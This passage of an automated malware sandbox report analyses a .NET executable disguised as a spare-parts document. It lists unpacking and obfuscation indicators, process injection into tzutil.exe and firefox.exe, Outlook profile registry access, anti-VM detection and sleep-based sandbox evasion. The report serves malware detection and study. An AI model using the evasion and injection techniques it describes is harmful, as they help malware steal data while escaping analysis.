                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: tzutil.pdbGCTL source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938382420.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2602793009.0000000001368000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xAbOwtcTtZmjBX.exe, 00000006.00000002.2601239645.000000000044E000.00000002.00000001.01000000.0000000C.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000000.2012860631.000000000044E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1938178930.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1940155540.00000000031AB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1938178930.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1940155540.00000000031AB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: mSVq.pdb source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: Binary string: mSVq.pdbSHA256 source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: Binary string: tzutil.pdb source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938382420.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2602793009.0000000001368000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.401e790.2.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7480000.3.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, fHWnEOM2Tpf5Q5oMa0.cs.Net Code: craRLN6UZw System.Reflection.Assembly.Load(byte[])
                      Source: 9.2.tzutil.exe.398cd14.2.raw.unpack, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 10.0.xAbOwtcTtZmjBX.exe.2e3cd14.1.raw.unpack, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 10.2.xAbOwtcTtZmjBX.exe.2e3cd14.1.raw.unpack, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: 12.2.firefox.exe.3ae5cd14.0.raw.unpack, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: 0xF3BAF958 [Thu Jul 30 17:50:16 2099 UTC]
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_02DBF362 push esp; iretd 0_2_02DBF3F1
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_07228462 push 34072610h; iretd 0_2_0722846D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_0722C341 push eax; retf 0_2_0722C342
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_07229026 pushad ; retf 0_2_07229027
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_07228C9B push eax; retf 0_2_07228C9C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_07228CC2 push esp; retf 0_2_07228CC3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_004031D0 push eax; ret 4_2_004031D2
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_004169E7 push 0F6CFD2Bh; ret 4_2_00416A18
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00423A0A push esp; ret 4_2_00423A0D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00419359 push ds; ret 4_2_0041935B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00418366 pushad ; iretd 4_2_00418367
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00408325 push dword ptr [ebx+5Dh]; ret 4_2_0040830B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00417388 push edi; ret 4_2_0041738D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00419477 push edx; ret 4_2_00419485
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00408403 push 00000074h; iretd 4_2_0040840B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00417411 push eax; ret 4_2_00417414
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00411D6F push ds; iretd 4_2_00411DBD
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00411D7B push ds; iretd 4_2_00411DBD
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0041758A push ebp; ret 4_2_004175A6
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0040D66A push ecx; iretd 4_2_0040D6D9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00414E05 push cs; retf 4_2_00414E14
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0040860D push cs; retf 4_2_0040860E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00413E93 pushfd ; ret 4_2_00413F00
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_00413EBC pushfd ; ret 4_2_00413F00
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011909AD push ecx; mov dword ptr [esp], ecx4_2_011909B6
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0336225F pushad ; ret 9_2_033627F9
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033627FA pushad ; ret 9_2_033627F9
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_033909AD push ecx; mov dword ptr [esp], ecx9_2_033909B6
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_0336283D push eax; iretd 9_2_03362858
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AB41B5 push edi; ret 9_2_00AB41BA
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00AB6186 push ds; ret 9_2_00AB6188
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeStatic PE information: section name: .text entropy: 7.942639726228952
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, aAVqwIHAuQOWZBX44ZU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jbEYIL2w7x', 'bBAYgQQXGs', 'MBIYc65svo', 'nNaYSJThon', 'dy3Y1Y9Dk4', 'gRoYhm50Lp', 'Vy6Ydkm0Jy'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, GvZdRVJyOgX6vdwbP7.csHigh entropy of concatenated method names: 'JmTiZVJXLo', 'hRDiQ8U5KV', 'HsnipwNGHh', 'q5tiJQBERj', 'gFZiEp8SyG', 'cO7iO5t3n1', 'yFriD2BxPJ', 'lBEiV8nw66', 'J85i2CbBsn', 'MbTiYxCMeZ'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, B8wjwMpAXSs0e9RYt6.csHigh entropy of concatenated method names: 'ke1CS72QOK', 'soSC1baUOR', 'ObrChdRM5M', 'tkHCdhji32', 'pOdC8YhKQ9', 'ijqC7Cpu24', 'yw1CayaRt4', 'v6NCve640r', 'dG2C5xWPkS', 'xZKCfTejqc'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, k7w472FbkqREX63Goh.csHigh entropy of concatenated method names: 'bdixB777Am', 'KYNxW7rvSl', 'nFxxLOwlWV', 'OdAxZk9fHU', 'iB3xbdCwqH', 'jBFxQtJOBo', 'kBcx9vJqiE', 'geXxpKeS09', 'oMMxJ5HPTY', 'hbUxtTlVUJ'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, EdWBC6fJE5an30g4aK.csHigh entropy of concatenated method names: 'NPZYiwaSoZ', 'UlxYT7PdxB', 'v3cYrFjs6t', 'aUkYx9RcKd', 'ut6Y2fUKLY', 'JrnYMULvQB', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, hJ4eGdSFCWwByDrvei.csHigh entropy of concatenated method names: 'Oa0EPmRe61', 'mrVEg9jV5f', 'D91ES30aE1', 'FFLE1vu2J4', 'SlAEXXML6V', 'uG1EKNpcAv', 'wxXE6qeDkg', 'm4dEwa0eAV', 'S6JEmlpgK0', 'mDHE4MMZeA'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, VX1WMQ4pCjAgiZCrKj.csHigh entropy of concatenated method names: 'jKMxnSBUww', 'Fipxi46ZLO', 'p5KxrM53LU', 'JaTrfUArne', 'N7FrzA2rRZ', 'FSYxAu1SGg', 'AJ0xH3VC5n', 'bo8xU1rH2K', 'HmSxl7bPO2', 'yykxRPDWM5'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, WKsMh4aJB8v1vmJGpy.csHigh entropy of concatenated method names: 'pmO2EqBncS', 'Q7E2D4l6OB', 'AC122exbfy', 'aBW2oSXdjY', 'UiL20Xvorn', 'cAb2sYTbtv', 'Dispose', 'm2RVnIYjtg', 'RnaVChYhnn', 'HSMVi81JmJ'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, D7IbiP7lufOqERxTog.csHigh entropy of concatenated method names: 'yIUDv9YGvL', 'yL0Df8fDLP', 'FUiVA5Dtpr', 'tswVHClvwP', 'Bw3DIxuX4n', 'R0tDggu4w5', 'JLiDc1uRyh', 'FbmDSwh84i', 'yB6D1tefnS', 'Yf4Dh0i1Av'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, TgnXTghrZscgKYm9Pq.csHigh entropy of concatenated method names: 'ToString', 'usHOIHP3N4', 'NjvOXnW3SE', 'pg7OKkkLRp', 'relO6GRnPK', 'LwiOwCdNhC', 'iMaOmbENEu', 'oCFO49UO66', 'RHbOGDpWV7', 'y5yOFy55Et'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, FRewkXzVhtRWMkGF2x.csHigh entropy of concatenated method names: 'tl1YQYPVCT', 'OsOYpEsg1a', 'UKIYJuBRv4', 'PorYqRGKuM', 'l5iYX1u3XX', 'pPrY62yLZt', 'PrwYwoLMPN', 'IXFYsyP0i7', 'YdrYBmdEUa', 'SPrYWgVt2G'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, Ef58dAHH66vD3rYXUMr.csHigh entropy of concatenated method names: 'sgmYfsgUDr', 'Ko2YzP1eYW', 'PjUoAGS79S', 'leDoHHMYfI', 'xqgoUJ81ns', 'OZvolX4sEr', 'Q1ZoRuHE7I', 'RWSoenQgue', 'O2ZonBJ6Kv', 'bwIoCxUHGc'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, JWvkefUISQsCOlZPGJ.csHigh entropy of concatenated method names: 'tlnLxdcjJ', 'h6TZq1Iit', 'H8vQV2Xye', 'ffA9xjvqV', 'nrPJkLgOD', 'owgtc4s1j', 'Cd7YCN8tUgVqG5Q02K', 'BguDEZn02enZxgw3gP', 'VGdVi41RA', 'jnGY0mWEr'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, fHWnEOM2Tpf5Q5oMa0.csHigh entropy of concatenated method names: 'BQolelQOQ6', 'BtqlnG12uH', 'XGylCdYau8', 'oHEliSu9Rw', 'BHalTTvL2Z', 'hu7lrHSR8p', 'zPilxm3SCg', 'lQHlMEx1PJ', 'hrwlueOibp', 'VrUlkoiNZd'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, OisRlDHROlCGeMXyCnk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UPKj2yNZ9W', 'Y2sjYtDcXJ', 'G5qjolcsj4', 'HDEjjFhABR', 'eh7j0oVfx0', 'A9Fj3n5mDL', 'U0FjssEPZY'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, eY355w5Y90m0a0ir0L.csHigh entropy of concatenated method names: 'bAe2qqPpYs', 'TyX2XVdFGP', 'FOu2KYLnfD', 'Kqi26AIYBQ', 'jPL2wTkg6I', 'tP72mWAiBw', 'RsI24pNJvG', 'CR62GVZChh', 'fEh2FYeoKP', 'N0s2PNFRFr'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, PvyDwTcp9INFxdLgtr.csHigh entropy of concatenated method names: 'pFfNpIMZCZ', 'rqANJPT0gM', 'epSNq7Ds87', 'iKYNXuEl2B', 'qoNN6cFxXE', 'QUxNwCMjyv', 'ETbN4SKQJH', 'k8ZNGllBan', 'gImNPh9ygu', 'stfNIODvtb'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, c1wO0WCSg93vOwsxYt.csHigh entropy of concatenated method names: 'Dispose', 'Uv1H5vmJGp', 'NC4UXEvQAb', 'zxENhdOXi0', 'nZ1HfyL3UM', 'eLjHzfVX0W', 'ProcessDialogKey', 'XneUAY355w', 's90UHm0a0i', 'j0LUUJdWBC'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, e65auVqkD1n2Nc9kZT.csHigh entropy of concatenated method names: 'fwKre74mug', 'sm7rCJUcpW', 'xGprT1PR5h', 'GAbrxaMuAH', 'UmlrMoFIr5', 'SENT8Truuo', 'N19T7KSbMd', 'kM6TaBEn3V', 'FfkTv4P7Bv', 'jM8T57tWsA'
                      Source: 0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7c00000.4.raw.unpack, JLkSyORORn2JhG5gZM.csHigh entropy of concatenated method names: 'OAbHx8wjwM', 'aXSHMs0e9R', 'ryOHkgX6vd', 'JbPHy76f63', 'g6qHEkne65', 'WuVHOkD1n2', 'A5U7A2dcwPRbU5YO8o', 'KksVq1y5WIhwD1vWLr', 'YfcHHgiSvc', 'mv4HluYL5p'
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe PID: 7424, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D324
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D944
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D504
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D544
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF908190154
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeMemory allocated: 1460000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeMemory allocated: 2E00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeMemory allocated: 7E90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeMemory allocated: 8E90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeMemory allocated: 9040000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeMemory allocated: A040000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 0_2_07310007 rdtsc 0_2_07310007
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeAPI coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\tzutil.exeAPI coverage: 2.6 %
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe TID: 7448Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exe TID: 8124Thread sleep count: 120 > 30Jump to behavior
